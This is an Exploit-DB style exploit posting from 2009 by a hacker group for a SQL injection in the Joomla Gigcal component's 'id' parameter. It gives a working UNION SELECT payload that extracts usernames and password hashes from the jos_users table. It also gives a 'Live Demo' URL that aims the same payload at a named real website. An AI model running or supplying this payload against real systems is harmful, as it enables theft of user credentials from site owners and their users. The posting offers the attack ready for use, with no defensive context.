Joomla! Component Gigcal 1.x - 'id' SQL Injection

EDB-ID:

7815




Platform:

PHP

Date:

2009-01-18


*****************************************************************************
* 					 	                            *
*           Joomla Component Gigcal SQL Injection Vulnerability             *
*                           						    *
*****************************************************************************

***************************************
[=] Vulnerability found by: Lanti-Net
[=] Contact: lanti-net[at]hotmail[dot]com
[=] Site: www.khg-crew.ws
[=] Greetz: boom3rang, KHG, urtan, H!tm@N , war_ning, chs, redc00de , SpYrO
[=]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-
***************************************
[=] Exploit  : /index.php?option=com_gigcal&Itemid=78&id={SQL}
[=] Example  : /index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
[=] Live Demo: http://www.fermaten.dk/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
***************************************
[=] Proud 2 be Albanian
[=] Proud 2 be Muslim
[=] United States of Albania
***************************************

# milw0rm.com [2009-01-18]